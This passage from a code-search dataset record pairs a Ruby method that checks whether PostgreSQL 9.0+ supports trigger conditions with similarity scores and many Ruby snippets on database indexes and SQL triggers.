"def load_physical_schema(conn, builder)\n builder.indexes{\n conn.tables.each{|table|\n conn.indexes(table).each_pair{|name, defn|\n next if defn[:unique]\n builder.index(name, {:relvar => table, :attributes => defn[:columns]})\n }\n }\n }\n end",
"def method_missing ( method, *args )\n # Handle all valid *_index/*_key calls:\n return _addIndexes( method, *args ) if VALID_INDEX_HINTS.include? method \n super\n end",
"def create_indexes\n source_attributes = self.base_class.attributes\n self.indexes.each do |name, index|\n opts = {:table_name => index.table_name, :id => :id}\n if index.range_key?\n if index.range_keys.select{|v| !source_attributes[v].nil? && source_attributes[v][:type] == :string}.any?\n opts[:range_key] = { :range => :string }\n else\n opts[:range_key] = { :range => :number }\n end\n else\n opts[:range_key] = nil\n end\n self.create_table(opts)\n end\n end",
"def supports_index_parsing?\n respond_to?(:indexes)\n end",
"def indexes(table_name, name = nil)#:nodoc:\n indexes = []\n current_index = nil\n (execute(\"SHOW KEYS FROM #{table_name}\", name) || []).each do |row|\n if current_index != row[2]\n next if row[2] == \"PRIMARY\" # skip the primary key\n current_index = row[2]\n indexes << ActiveRecord::ConnectionAdapters::IndexDefinition.new(row[0], row[2], row[1] == \"0\", [], row[10] == \"SPATIAL\")\n end\n indexes.last.columns << row[4]\n end\n indexes\n end",
"def create_simple_index(table_name, index_name, column)\n spec = new IndexSpecification(index_name, column.to_java_bytes)\n create_index(table_name, spec)\nend",
"def stream_all_indexed_slices(index, key)\n expr = do_op(:create_idx_expr, index, key, \"EQ\")\n\n start_row = ''\n row_count = 10\n has_more_rows = true\n\n while (start_row != nil)\n clause = do_op(:create_idx_clause, [expr], start_row, row_count)\n\n rows = self.conn.get_indexed_slices(column_family, clause, index,\n :key_count => row_count,\n :key_start => start_row)\n\n rows = rows.keys\n rows.shift unless start_row == ''\n start_row = rows.last\n\n rows.each do |row|\n start_column = ''\n column_count = 1_000\n has_more_columns = true\n\n while has_more_columns\n clause = do_op(:create_idx_clause, [expr], row, 1)\n chunk = self.conn.get_indexed_slices(column_family, clause, nil,\n :start => start_column,\n :count => column_count)\n\n # Get first row's columns, because where are getting only one row [see clause, for more details]\n key = chunk.keys.first\n columns = chunk[key]\n\n columns.shift unless start_column == ''\n yield(key, columns) unless chunk.empty?\n\n if columns.size >= column_count - 1\n #Assume there are more columns, use last column as start of next slice\n start_column = columns.last.column.name\n column_count = 1_001\n else\n has_more_columns = false\n end\n end\n end\n end\n end",
"def ensureIndex(table,keys,options={})\n connection.ensureIndex(path(table),keys,options)\n end",
"def stream_all_indexed_slices(index, key)\n expr = do_op(:create_idx_expr, index, key, \"EQ\")\n\n start_row = ''\n row_count = 10\n has_more_rows = true\n\n while (start_row != nil)\n clause = do_op(:create_idx_clause, [expr], start_row, row_count)\n\n rows = self.conn.get_indexed_slices(column_family, clause, 'account_id',\n :key_count => row_count, :key_start => start_row)\n rows = rows.keys\n rows.shift unless start_row == ''\n start_row = rows.last\n\n rows.each do |row|\n start_column = ''\n column_count = 1_000\n has_more_columns = true\n\n while has_more_columns\n clause = do_op(:create_idx_clause, [expr], row, 1)\n chunk = self.conn.get_indexed_slices(column_family, clause, nil,\n :start => start_column,\n :count => column_count)\n\n key = chunk.keys.first\n columns = chunk.values.first\n columns.shift unless start_column == ''\n yield(key, columns) unless chunk.empty?\n\n if columns.size >= column_count - 1\n #Assume there are more columns, use last column as start of next slice\n start_column = columns.last.column.name\n column_count = 1_001\n else\n has_more_columns = false\n end\n end\n end\n end\n end",
"def multi_column_index_limit\n defined?(@multi_column_index_limit) && @multi_column_index_limit || 32\n end",
"def create_indexes(table)\n return if !@index\n if !@dry_run\n begin\n connection.query(\"ALTER IGNORE TABLE #{table} ADD PRIMARY KEY (dtime, id)\")\n verbose \" Created primary key index.\"\n rescue\n nil # If we couldn't create the index (because it exists), that's OK.\n end\n end\n end",
"def ensure_indices\n @dao.collection.ensure_index(\n [['identity.email', Mongo::ASCENDING]],\n index_options([:background, :unique])\n )\n @dao.collection.ensure_index([['customer_id', Mongo::ASCENDING]], index_options)\n @dao.collection.ensure_index([['slug', Mongo::ASCENDING]], index_options)\n @indexed = true\n end",
"def index\n set_index\n end",
"def index\n return patterned_index if params[:pattern].present?\n\n index_full\n end",
"def rebuild_pgindex!\n self.all.each { |model| model.rebuild_pgindex! }\n end",
"def index\r\n build_index unless @index\r\n @index\r\n end",
"def index_on_ivar( field ) \n index_on( field,\n :map => \"\n function(doc) {\n if( doc['class'] == '#{parent_class}' &&\n doc['ivars'] && doc['ivars']['@#{field}'] ){\n emit( doc['ivars']['@#{field}'], 1 );\n }\n }\n \"\n )\n end",
"def test_spatial_index\n shape_lyr = create_poly_layer(@shape_ds)\n feat = populate_poly_layer(shape_lyr)\n\n add_geometryless_feature(shape_lyr)\n\n shape_lyr.set_attribute_filter(\"\")\n @shape_ds.execute_sql('CREATE SPATIAL INDEX ON tpoly')\n\n assert(File.exist?(File.join(temp_dir, 'tpoly.qix')),\n 'tpoly.qix not created' )\n\n geom = Gdal::Ogr.create_geometry_from_wkt('LINESTRING(479505 4763195,480526 4762819)')\n shape_lyr.set_spatial_filter(geom)\n\n assert(check_features_against_list(shape_lyr, 'eas_id', [ 158, nil ]))\n shape_lyr.set_spatial_filter(nil)\n @shape_ds.execute_sql( 'DROP SPATIAL INDEX ON tpoly' )\n\n assert(!File.exist?(File.join(temp_dir, 'tpoly.qix')),\n 'tpoly.qix not deleted')\n end",
"def indexed\n meta(index: true)\n end",
"def index_exists?(index)\n indexes([index[:table]]).find {|i| i[\"columns\"] == index[:columns]}\n end",
"def indexes(table, stream)\n if (indexes = @connection.indexes(table)).any?\n add_index_statements = indexes.map do |index|\n statement_parts = [\n ('add_index ' + index.table.inspect),\n index.columns.inspect,\n (':name => ' + index.name.inspect),\n ]\n statement_parts << ':unique => true' if index.unique\n\n index_lengths = (index.lengths || []).compact\n statement_parts << (':length => ' + Hash[index.columns.zip(index.lengths)].inspect) unless index_lengths.empty?\n\n index_orders = (index.orders || {})\n statement_parts << (':order => ' + index.orders.inspect) unless index_orders.empty?\n\n # changed from rails 2.3\n statement_parts << (':where => ' + index.where.inspect) if index.where\n statement_parts << (':index_type => ' + index.index_type.inspect) if index.index_type\n statement_parts << (':index_opclass => ' + index.index_opclass.inspect) if index.index_opclass.present?\n # /changed\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def safe_add_index(*args, **options); end",
"def index_finalized\n index\n end",
"def indexes\n @model.indexes.select{|index| index.columns.include? self.name}\n end",
"def install_missing_indexes\n db_connection.execute(\n <<-SQL\n SELECT install_missing_indexes();\n SQL\n )\n end",
"def index_exists?(*args)\n super\n end"
] |
[
"0.78717965",
"0.7054134",
"0.7054134",
"0.63987356",
"0.63508844",
"0.63295084",
"0.6323869",
"0.6159993",
"0.61426693",
"0.61346114",
"0.6086542",
"0.60757685",
"0.6067708",
"0.6039056",
"0.60032016",
"0.5991477",
"0.5991477",
"0.5944628",
"0.5943683",
"0.5924851",
"0.59207773",
"0.59115565",
"0.5903184",
"0.5900522",
"0.5900522",
"0.58731586",
"0.58711076",
"0.58652544",
"0.58652544",
"0.5849039",
"0.58179593",
"0.5793357",
"0.575849",
"0.57545364",
"0.57352597",
"0.5715954",
"0.56998366",
"0.56998366",
"0.5695067",
"0.56910884",
"0.56906945",
"0.5690127",
"0.56866705",
"0.5677714",
"0.5665117",
"0.56449306",
"0.5639495",
"0.5639495",
"0.56345636",
"0.56335753",
"0.56326103",
"0.5619838",
"0.5617882",
"0.5612908",
"0.5612908",
"0.5610724",
"0.55734867",
"0.5542291",
"0.55265963",
"0.5522739",
"0.55061144",
"0.54832965",
"0.5482879",
"0.5471717",
"0.5459486",
"0.54343784",
"0.54343784",
"0.54323804",
"0.5430369",
"0.54237896",
"0.5418028",
"0.54003245",
"0.54002213",
"0.5393312",
"0.5385924",
"0.53809",
"0.53653294",
"0.5364801",
"0.5356759",
"0.5353016",
"0.5351405",
"0.53427196",
"0.5338789",
"0.5337907",
"0.5335454",
"0.5335065",
"0.5325844",
"0.53227556",
"0.5317773",
"0.5313214",
"0.53032285",
"0.53018266",
"0.52670616",
"0.52604824",
"0.52540165",
"0.52506703",
"0.5244728",
"0.5243229",
"0.5239263",
"0.52372897"
] |
0.79788727
|
0
|
PostgreSQL 9.0+ supports trigger conditions.
|
def supports_trigger_conditions?
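  # Trigger WHEN conditions arrived in PostgreSQL 9.0, reported as server_version 90000.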
  server_version >= 90000
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def pgt_trigger(table, trigger_name, function_name, events, definition, opts={})\n create_function(function_name, definition, :language=>:plpgsql, :returns=>:trigger, :replace=>true)\n create_trigger(table, trigger_name, function_name, :events=>events, :each_row=>true, :after=>opts[:after])\n end",
"def triggers\n res = select_all <<-SQL\n SELECT n.nspname as schema,\n c.relname as table,\n t.tgname as trigger_name,\n t.tgenabled as enable_mode,\n t.tgdeferrable as is_deferrable,\n t.tginitdeferred as is_initially_deferrable,\n pg_catalog.pg_get_triggerdef(t.oid, true) as trigger_definition\n FROM pg_catalog.pg_trigger t\n INNER JOIN pg_catalog.pg_class c ON c.oid = t.tgrelid\n INNER JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace\n WHERE c.relkind IN ('r', 'v')\n AND NOT t.tgisinternal\n ORDER BY 1, 2, 3;\n SQL\n\n res.inject([]) do |buffer, row|\n schema = row['schema']\n table = row['table']\n trigger_name = row['trigger_name']\n is_deferrable = row['is_deferrable']\n is_initially_deferred = row['is_initially_deferred']\n\n trigger_definition = row['trigger_definition']\n\n is_constraint = is_constraint?(trigger_definition)\n proc_name = parse_proc_name(trigger_definition)\n event = parse_event(trigger_definition, trigger_name)\n condition = parse_condition(trigger_definition)\n\n for_every = !!(trigger_definition =~ /FOR[\\s]EACH[\\s]ROW/) ? :row : :statement\n\n if proc_name && event\n buffer << ::PgSaurus::ConnectionAdapters::TriggerDefinition.new(\n trigger_name,\n proc_name,\n is_constraint,\n event,\n for_every,\n is_deferrable,\n is_initially_deferred,\n condition,\n table,\n schema\n )\n end\n buffer\n end\n end",
"def checkTrigger\n\t end",
"def create_trigger(table_name, proc_name, event, options = {})\n\n end",
"def create_trigger_sql(table, name, function, opts=OPTS)\n events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]\n whence = opts[:after] ? 'AFTER' : 'BEFORE'\n if filter = opts[:when]\n raise Error, \"Trigger conditions are not supported for this database\" unless supports_trigger_conditions?\n filter = \" WHEN #{filter_expr(filter)}\"\n end\n \"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})\"\n end",
"def triggers\n\n end",
"def create_trigger name, type, table_name, *actions\n create_function \"#{name}_f\", :returns=>'trigger',:as=>'$BODY$' do\n yield\n end\n execute %{CREATE TRIGGER #{name} #{type.to_s.upcase} #{actions.map{|str|str.upcase}.join(' OR ')}\n ON \"#{table_name}\" FOR EACH ROW\n EXECUTE PROCEDURE #{name}_f();}\n end",
"def enable_trigger(trigger = 'ALL')\n connection.enable_trigger(table_name, trigger)\n end",
"def parse_condition(trigger_definition)\n trigger_definition[/WHEN[\\s](.*?)[\\s]EXECUTE[\\s](FUNCTION|PROCEDURE)/m, 1]\n end",
"def is_constraint?(trigger_definition)\n !!(trigger_definition =~ /^CREATE CONSTRAINT TRIGGER/)\n end",
"def triggerStatements _args\n \"triggerStatements _args;\" \n end",
"def create_or_replace_replication_trigger_function(params)\n execute(<<-end_sql)\n DROP PROCEDURE IF EXISTS `#{params[:trigger_name]}`;\n end_sql\n \n activity_check = \"\"\n if params[:exclude_rr_activity] then\n activity_check = <<-end_sql\n DECLARE active INT;\n SELECT count(*) INTO active FROM #{params[:activity_table]};\n IF active <> 0 THEN\n LEAVE p;\n END IF;\n end_sql\n end\n\n execute(<<-end_sql)\n CREATE PROCEDURE `#{params[:trigger_name]}`(change_key varchar(2000), change_new_key varchar(2000), change_type varchar(1))\n p: BEGIN\n #{activity_check}\n INSERT INTO #{params[:log_table]}(change_table, change_key, change_new_key, change_type, change_time)\n VALUES('#{params[:table]}', change_key, change_new_key, change_type, now());\n END;\n end_sql\n \n end",
"def trigger_definition(table_name, trigger_name, name = nil)\n raise \"Internal Error: Connection adapter did not override abstract function\"\n end",
"def create_replication_trigger(params)\n create_or_replace_replication_trigger_function params\n\n %w(insert update delete).each do |action|\n execute(<<-end_sql)\n DROP TRIGGER IF EXISTS `#{params[:trigger_name]}_#{action}`;\n end_sql\n\n # The created triggers can handle the case where the trigger procedure\n # is updated (that is: temporarily deleted and recreated) while the\n # trigger is running.\n # For that an MySQL internal exception is raised if the trigger\n # procedure cannot be found. The exception is caught by an trigger\n # internal handler. \n # The handler causes the trigger to retry calling the\n # trigger procedure several times with short breaks in between.\n\n trigger_var = action == 'delete' ? 'OLD' : 'NEW'\n if action == 'update'\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause('OLD', params)}, #{key_clause('NEW', params)}, '#{action[0,1].upcase}');\"\n else\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause(trigger_var, params)}, null, '#{action[0,1].upcase}');\"\n end\n execute(<<-end_sql)\n CREATE TRIGGER `#{params[:trigger_name]}_#{action}`\n AFTER #{action} ON `#{params[:table]}` FOR EACH ROW BEGIN\n DECLARE number_attempts INT DEFAULT 0;\n DECLARE failed INT;\n DECLARE CONTINUE HANDLER FOR 1305 BEGIN\n DO SLEEP(0.05);\n SET failed = 1;\n SET number_attempts = number_attempts + 1;\n END;\n REPEAT\n SET failed = 0;\n #{call_statement}\n UNTIL failed = 0 OR number_attempts >= 40 END REPEAT;\n END;\n end_sql\n end\n\n end",
"def supports_triggers?\n version[0] >= 5\n end",
"def trigger\n trigger_function = \"insert_#{master_table}\"\n unless @column == 'page'\n column = \"#{@column},\"\n column_function = \"coalesce(quote_literal(NEW.#{@column}), 'NULL') || ',' ||\"\n end\n \n cmd = <<-COMMAND\n CREATE OR REPLACE FUNCTION #{trigger_function}() \n RETURNS TRIGGER AS $$ \n DECLARE\n ins_sql TEXT; \n BEGIN\n ins_sql := 'INSERT INTO daily_#{@column}_views_' || (NEW.writer_id % #{@partition_size}) ||\n '(date,article_id,#{column}count,writer_id,partition_id) \n VALUES ' ||\n '('|| quote_literal(NEW.date) || ',' || NEW.article_id ||',' ||\n \t#{column_function} \n \t\t\tNEW.count || ',' || \n \t\t\tNEW.writer_id || ',' || (NEW.writer_id % #{@partition_size}) ||')'\n ; \n EXECUTE ins_sql;\n RETURN NULL;\n END; \n $$\n LANGUAGE plpgsql;\n \n CREATE TRIGGER #{trigger_function}_trigger\n BEFORE INSERT ON #{master_table}\n FOR EACH ROW EXECUTE PROCEDURE #{trigger_function}();\n COMMAND\n @conns.each{|conn| conn.exec(cmd)}\n end",
"def enable_triggers(enable = true)\n triggers.each do |trigger|\n sql = \"alter trigger #{trigger.name} #{enable ? :enable : :disable}\"\n OracleTables.exec_sql sql\n end\n end",
"def find_and_trigger_event(event_type, args = nil)\r\n \r\n case event_type\r\n when :before_change\r\n \r\n if respond_to?(:before_change)\r\n \r\n results = send(:before_change, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :after_change\r\n \r\n if respond_to?(:after_change)\r\n \r\n results = send(:after_change, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :before_change_field\r\n \r\n #CALL FOR A SPECIFIC FIELD THAT HAS CHANGED\r\n trigger_function_name = \"#{:before_change_field}_#{args.field_name}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n #CALL FOR ANY FIELD THAT CHANGES\r\n trigger_function_name = \"#{:before_change_field}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n when :after_change_field\r\n #looks in own class for :after_change_field for the field passed, requires the parameter of a Field object to be passed\r\n \r\n #SAPPHIRE UPDATE\r\n #SEARCH FOR ACTIVE MAP DEFINITION THAT INCLUDES THE CURRENT TABLE AND FIELD.\r\n #IF ANY ARE FOUND QUEUE THE PROCESS\r\n if args.table.field_order.include?(\"student_id\")\r\n \r\n if map_id = $tables.attach(\"SAPPHIRE_INTERFACE_MAP\").field_value(\r\n \"primary_id\",\r\n \"WHERE athena_table = '#{table_name }'\r\n AND athena_field = '#{args.field_name }'\r\n AND trigger_event = 'after_change_field'\"\r\n )\r\n \r\n sid = $tables.attach(args.table.table_name).field_value(\"student_id\", \"WHERE primary_id = '#{args.primary_id}'\")\r\n student = $students.get(sid)\r\n \r\n if student && student.active.is_true?\r\n \r\n queue_record = $tables.attach(\"SAPPHIRE_INTERFACE_QUEUE\").new_row\r\n queue_record.fields[\"map_id\" ].value = map_id\r\n queue_record.fields[\"athena_pid\" ].value = args.primary_id\r\n queue_record.save\r\n \r\n end\r\n \r\n end\r\n \r\n end\r\n \r\n #CALL FOR A SPECIFIC FIELD THAT HAS CHANGED\r\n trigger_function_name = \"#{:after_change_field}_#{args.field_name}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n #CALL FOR ANY FIELD THAT CHANGES\r\n trigger_function_name = \"#{:after_change_field}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :before_load #any table can have this event for self table\r\n \r\n continue_with_load = true\r\n \r\n this_trigger_event = \"before_load_#{table_name.downcase}\"\r\n \r\n tables_with_before_load_events = args ? args : event_array(this_trigger_event)\r\n \r\n tables_with_before_load_events.each{|file|\r\n this_table = $tables.attach(file)\r\n \r\n begin\r\n continue_with_load = this_table.send(this_trigger_event)\r\n \r\n rescue=> e\r\n #raise e #THIS SHOULD HAVE BEEN A SYSTEM NOTIFICATION - ADDING NOW BUT LEACING THIS NOTE HERE TO HELP IDENTIFY ANY ISSUES THAT MAY COME TO LIGHT WHICH WERE CONCEALED BY THIS BEFORE...\r\n $base.system_notification(\r\n subject = \"BEFORE LOAD FAILED - #{file}\",\r\n content = \"Don't just stand there and shout it; do something about it... 
Here's the error:\r\n #{e.message}\r\n <br>\r\n <br>\r\n #{e.backtrace}\"\r\n )\r\n \r\n end\r\n \r\n } if tables_with_before_load_events\r\n \r\n return continue_with_load\r\n \r\n when :after_load #any table can have this event for self table\r\n \r\n this_trigger_event = \"after_load_#{table_name.downcase}\"\r\n \r\n tables_with_after_load_events = args ? args.dup : event_array(this_trigger_event)\r\n \r\n db_config_record(\r\n field_name = \"phase_total\",\r\n new_value = tables_with_after_load_events.join(\",\")\r\n )\r\n db_config_record(\r\n field_name = \"phase_completed\",\r\n new_value = nil\r\n )\r\n \r\n if !args || args.include?(\"move_source_to_dest\")\r\n tables_with_after_load_events.delete(\"move_source_to_dest\")\r\n move_source_to_dest\r\n end\r\n \r\n tables_with_after_load_events.each{|file|\r\n this_table = $tables.attach(file)\r\n db_config_record(\r\n field_name = \"after_load_status\",\r\n new_value = \"Started #{file} - #{DateTime.now.strftime(\"%Y-%m-%d %H:%M:%S\")}\"\r\n )\r\n \r\n begin\r\n this_table.send(this_trigger_event)\r\n db_config_record = $tables.attach(\"Db_Config\").by_table_name(table_name)\r\n phase_completed = db_config_record.fields[\"phase_completed\"].value\r\n phase_completed = (phase_completed ? \"#{phase_completed},#{file}\" : file)\r\n db_config_record(\r\n field_name = \"phase_completed\",\r\n new_value = phase_completed\r\n )\r\n db_config_record(\r\n field_name = \"after_load_status\",\r\n new_value = \"Completed #{file} - #{DateTime.now.strftime(\"%Y-%m-%d %H:%M:%S\")}\"\r\n )\r\n \r\n rescue=> e\r\n after_load_failed(message = \"#{file} - #{e.message} <br><br> #{e.backtrace}\", e)\r\n raise e\r\n end\r\n \r\n } if tables_with_after_load_events\r\n \r\n when :after_insert\r\n send(:after_insert, args) if respond_to?(:after_insert)\r\n \r\n when :after_save\r\n send(:after_save, args) if respond_to?(:after_save)\r\n \r\n when :before_insert\r\n #Looks in own class for before_insert event, requires the parameter of a Row object to be passed\r\n if respond_to?(:before_insert)\r\n send(:before_insert, args)\r\n else\r\n return true\r\n end\r\n \r\n end\r\n \r\n return true\r\n \r\n end",
"def trigger!\n end",
"def create_trigger(table, name, function, opts=OPTS)\n self << create_trigger_sql(table, name, function, opts)\n end",
"def condition; end",
"def check_event_trigger_here(triggers)\n return false\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def trigger?(key)\n return @trigger[ key.is_a?(Symbol) ? KEY.get(key) : key ] \n end",
"def trigger(owner, event, *args); end",
"def create_trigger(database, table)\n options = self.options(table)\n\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => false,\n }\n\n event_filter = options[:event_filter]\n params[:filter_conditions] = event_filter.filter_conditions if event_filter.respond_to?(:filter_conditions)\n\n session.send(database).create_replication_trigger params\n end",
"def triggerize rel, target\n raise \"Wrong rel, expecting up or down\" if rel == nil\n raise \"Wrong target, expecting float\" if target == nil\n if rel == 'up'\n return lambda { |x| x >= target }\n elsif rel == 'down'\n return lambda { |x| x <= target }\n end\n end",
"def parse_event(trigger_definition, trigger_name)\n trigger_definition[/^CREATE[\\sA-Z]+TRIGGER[\\s]#{Regexp.escape(trigger_name)}[\\s](.*?)[\\s]ON[\\s]/m, 1]\n end",
"def test_can_retrieve_trigger_metadata\n skip(\"Triggers were introduced in Cassandra 2.0\") if CCM.cassandra_version < '2.0.0'\n\n # trigger1, on test1 table\n @session.execute(\"CREATE TRIGGER trigger1 ON simplex.test1 USING 'org.apache.cassandra.triggers.AuditTrigger'\")\n @listener.wait_for_trigger('simplex', 'test1', 'trigger1')\n\n assert @cluster.keyspace('simplex').table('test1').has_trigger?('trigger1')\n trigger_meta = @cluster.keyspace('simplex').table('test1').trigger('trigger1')\n assert_equal 'trigger1', trigger_meta.name\n assert_equal 'test1', trigger_meta.table.name\n assert_equal 'org.apache.cassandra.triggers.AuditTrigger', trigger_meta.options['class']\n\n # trigger1, on test2 table\n @session.execute(\"CREATE TRIGGER trigger1 ON simplex.test2 USING 'org.apache.cassandra.triggers.AuditTrigger'\")\n @listener.wait_for_trigger('simplex', 'test2', 'trigger1')\n\n assert @cluster.keyspace('simplex').table('test2').has_trigger?('trigger1')\n trigger_meta2 = @cluster.keyspace('simplex').table('test2').trigger('trigger1')\n assert_equal 'trigger1', trigger_meta2.name\n assert_equal 'test2', trigger_meta2.table.name\n assert_equal 'org.apache.cassandra.triggers.AuditTrigger', trigger_meta2.options['class']\n\n refute_equal trigger_meta, trigger_meta2\n end",
"def get_triggers\n connect_db.fetch(\"SELECT RDB$TRIGGER_NAME, RDB$TRIGGER_SOURCE FROM RDB$TRIGGERS WHERE RDB$SYSTEM_FLAG = 0\")\n end",
"def conditions; end",
"def conditions; end",
"def cond; end",
"def cond; end",
"def cond; end",
"def check_event_trigger_there(triggers)\n return false\n end",
"def check_event_trigger_here(triggers)\n result = false\n return result\n end",
"def on_change(value)\n \n end",
"def can_trigged?(event)\n false\n end",
"def createTrigger _args\n \"createTrigger _args;\" \n end",
"def on trigger, &block\n @handlers[trigger] = [] unless @handlers.key? trigger\n @handlers[trigger] << block\n end",
"def setTriggerStatements _obj, _args\n \"_obj setTriggerStatements _args;\" \n end",
"def trigger_options\n triggers.map { |t, _| [t.gsub('on_', '').titlecase, t] }\n end",
"def replication_trigger_exists?(trigger_name, table_name)\n !select_all(\"select 1 from information_schema.triggers where trigger_schema = database() and trigger_name = '#{trigger_name}_insert' and event_object_table = '#{table_name}'\").empty?\n end",
"def event_change\n\t\n\tend",
"def trigger_exists?(table_name, trigger_name)\n triggers(table_name).detect { |i| i.name == trigger_name }\n end",
"def conditionally(*) end",
"def conditionally(*) end",
"def triggers(name = nil)\n raise \"Internal Error: Connection adapter did not override abstract function\"\n end",
"def check_triggers\n @triggers.each do |trigger|\n trigger.evaluate\n end\n end",
"def disable_trigger(trigger = 'ALL')\n connection.disable_trigger(table_name, trigger)\n end",
"def trigger_condition_met?(_job)\n true\n end",
"def trigger\n\n return []\n end",
"def enable_event_trigger(name, options = {})\n if options[:always] && options[:replica]\n raise ArgumentError.new(\"Cannot use :replica and :always together when enabling an event trigger.\")\n end\n\n sql = \"ALTER EVENT TRIGGER #{quote_generic(name)} ENABLE\"\n\n if options[:always]\n sql << ' ALWAYS'\n elsif options[:replica]\n sql << ' REPLICA'\n end\n\n execute \"#{sql};\"\n end",
"def preconditions\n ActiveRecord::VERSION::MAJOR >= 6 &&\n Helper.postgresql? &&\n primary_field? &&\n column.sql_type.to_s.match(TARGET_COLUMN_TYPE)\n end",
"def trigger? key=:any\n return @data.include? :down if key == :any\n @data[key] == :down\n end",
"def triggers\n @_triggers ||= Trigger\n .joins(:crud_action)\n .where(klass: item.class.name,\n crud_actions: { name: @transaction })\n end",
"def check_event_trigger_there(triggers)\n result = false\n return result\n end",
"def trigger_exists?(database, table)\n trigger_name = \"#{options(table)[:rep_prefix]}_#{table}\"\n session.send(database).replication_trigger_exists? trigger_name, table\n end",
"def switch_trigger_mode(database, table, exclude_rr_activity)\n options = session.configuration.options\n if session.send(database).replication_trigger_exists? \"#{options[:rep_prefix]}_#{table}\", table\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => exclude_rr_activity,\n }\n session.send(database).create_or_replace_replication_trigger_function(params)\n end\n end",
"def trigger\n @trigger ||= begin\n trigger = Scrutinize::Trigger.new\n\n # Trigger configured at top level\n keys = %w(methods method targets target)\n unless (@options.keys & keys).empty?\n trigger.add @options.select { |k,v| keys.include?(k) }\n end\n\n # Trigger configured under trigger key\n trigger.add @options['trigger'] if @options['trigger'].is_a?(Hash)\n\n # Triggers configured under triggers key\n if @options['triggers'].is_a? Array\n @options['triggers'].each { |t| trigger.add t }\n end\n\n trigger\n end\n end",
"def on_update_clause(action)\n on_delete_clause(action)\n end",
"def add_trigger_and_function(filename, trigger_tables, drop_function=false)\n build_query filename, 'triggers' do |seed, queries|\n queries[0] << %Q!BEGIN;\n CREATE OR REPLACE FUNCTION #{seed['name']}() RETURNS #{seed['function']['return']} AS $$\n BEGIN\n #{seed['function']['sql']}\n END;\n $$ LANGUAGE plpgsql;\n #{Array(trigger_tables).map do |table|\n \"CREATE TRIGGER #{seed['name']} #{seed['trigger']['event'].gsub('<TRIGGERTABLE>', table)} #{seed['trigger']['execute']} #{seed['name']}();\"\n end.join(\"\\n\")}\n COMMIT;!\n queries[1] << Array(trigger_tables).map { |table| \"DROP TRIGGER IF EXISTS #{seed['name']} ON #{table};\\n\" } << (drop_function ? \"DROP FUNCTION IF EXISTS #{seed['name']};\" : '')\n end\n end",
"def on_table?; @on_table; end",
"def add_trigger(condition, name=nil, &action)\n trigger = com.ardor3d.input.logical.InputTrigger.new(condition, &action)\n trigger.set_id(name) if name\n logical.registerTrigger(trigger)\n trigger\n end",
"def statement; end",
"def check_event_trigger_auto\n start if @trigger == 3\n end",
"def core_changed?\n qtype_name_changed? || option_set_id_changed? || constraint_changed?\n end",
"def core_changed?\n qtype_name_changed? || option_set_id_changed? || constraint_changed?\n end",
"def trigger param\r\n self.send \"trig_#{param[:type] || :edge}\".to_sym, param\r\n end",
"def add_function_update_timestamp(opts={})\n if has_function?(:update_timestamp)\n # if we have it, overwrite it if force is set\n if !opts[:force] \n return true \n end\n end\n func=%Q{\n BEGIN\n NEW.updated_at := now();\n RETURN NEW;\n END;\n }\n self.db.create_function :update_timestamp, func, :replace => true, :returns => 'trigger', :language => 'plpgsql'\n end",
"def remove_trigger(table_name, proc_name, options = {})\n\n end",
"def if_condition; end",
"def triggerType _args\n \"triggerType _args;\" \n end",
"def create_trigger(trigger, conditions = [], dampenings = [], _actions = [])\n full_trigger = {}\n full_trigger[:trigger] = trigger.to_h\n conds = []\n conditions.each { |c| conds.push(c.to_h) }\n full_trigger[:conditions] = conds\n damps = []\n dampenings.each { |d| damps.push(d.to_h) } unless dampenings.nil?\n full_trigger[:dampenings] = damps\n\n http_post 'triggers/trigger', full_trigger\n end",
"def triggers\n Triggers.all(connection)\n end",
"def triggered_by__potential_values(current_user = nil)\r\n TRIGGERED_BIES\r\nend",
"def trigger_quit(entered_name)\n entered_name.downcase == \"quit\" || entered_name.downcase == \"q\"\nend",
"def constraint_sql\n parameter_string = parameters.collect { |parameter_name| \"#{table.entity.attribute_by_name(parameter_name).sql.column_name}\" }.join(', ')\n function_call = \"#{self.qualified_function_name}(#{parameter_string}) = 1\"\n (self.or_conditions + [function_call]).join(' OR ')\n end",
"def after_commit(*); end",
